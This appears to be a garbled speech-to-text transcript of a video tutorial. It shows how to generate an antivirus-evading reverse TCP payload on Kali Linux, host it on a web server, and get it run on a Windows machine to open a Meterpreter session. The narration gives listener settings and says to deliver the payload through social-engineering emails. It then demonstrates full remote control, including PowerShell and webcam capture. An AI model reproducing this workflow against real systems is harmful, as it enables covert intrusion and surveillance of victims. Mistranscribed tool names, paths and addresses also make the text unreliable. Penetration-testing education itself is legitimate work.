Offensive security is the proactive side of cybersecurity. Instead of just defending systems, it involves stimulating the real-world attacks, finding vulnerabilities before bad actors do, testing how well system detects and respond to threat. It's the mindset of attack to protect. Today we are taking you to an offensive security tool called Whale. Whale is a classic offensive security tool because it generates payloads that mimic real malware, bypasses antivirus and endpoint defenses. We just logged into the Kali Linux. So let's start with our first example. I'll open a terminal. I'll open the terminal now. Let's see, who am I? Kali. I'm in the Kali Linux, right? Yeah. As part of this session, we'll be trying to generate a reverse shell payload using Whale, as designed to evade antivirus. So we'll be using our host machine, that is Windows-based machines, to bypass the basic defenses, and we'll try to execute the payload, which will initiate a connection back to the Kali machine. Let's start. Let's start with the commands. Sudo, I'll obviously use the sudo whale. Password for Kali, I'm just putting the password for Kali. So, yeah, we are trying to use the tool evasion. So, use one. So we are in the evasion console. Let's list what are the options we have. We have close to 41 options, so in which we are trying to use reverse TCP proxy Python command. So we use this command, copy selections, and use. So we are in the reverse TCP. So what we'll do here, we'll try to create a packet. Instead of that, before that, we'll just do we'll try to find out the IP address of Kali. So if config 10.91.16.91.128, we took the IP address. So let's set lhost 192.168.91.128, set lport 4444. So we'll generate payload, and we'll put a payload name, payload 1. So the payload has been created, this path. Alright. Now what we'll do, we exit from here. Alright, so once payload is created, we will navigate our path to that particular payload where it is. So you can see that we do have all the payloads. So we are currently looking at the payload 1. We'll remove all of the payload so we have only the payload 1. So now what we'll do, we'll create a Python 3 8080. Let's open a web browser and our local. Once we started our Apache web server, we can access that Kali Linux with the port what you have assigned there. So I have started the server with 8080. So I'm accessing that path with a Kali Linux 8080, and you can see that payload 1.bat. So I just downloaded and keep it ready. It's downloaded. So currently it is going to my local system. So when I say my local system is it is my local Windows system, RootCause. Alright, so here if you go to term folder, so in Windows machine, this will make this happen via social engineering, or put the email address and will ask users to download and run, right? So that's how this will come in the local system, Windows-based systems. Now, what happens when user tries to execute this file? It will create a sessions in my Kali, and I'll get the complete access of this machine in Kali itself. Will be there. So from the Windows browser, we managed to download the Payload 1, what we have created using Kali, and we have downloaded to our Windows box C::Kali temp. You see here, you can see that Payload 1, right? Now coming back to our Kali, we will create one more version file, so that sudo while evasion -p. Okay, so create a Payload 1, and we create Kali. Alright, return. Payload done is return. All good. Now what we'll do, we'll do a MSF console -r payload rc. Alright, it started a Metasploit framework console. Now what happened in Windows is somebody tried to execute this Payload 1 bad. You can see, wow. Metapredator session 1 opened. Metapredator session is something like sysknife post attack. You got the session, so it is opening the session. Sessions -I. Metapredator session. Wow. Now I got connected to Kali. I got connected to my Windows machines. So you can see here, I got the access. Ooh. Alright, so we are in the sessions. We can go to user's computer and see and open any kind of tools or exes from all systems. You can see that Payload is opened, and if you want to open PowerShell, PowerShell is also open in the user system. So we go back, and from here also if we go back, okay, again Metapredator. If you want to use webcam _snap, what it'll do, I hope this session is useful to start with. See how it goes. You can create a number of payloads and start listening to the different port numbers and see if you are able to monitor the weak points within the environments. Thank you once again.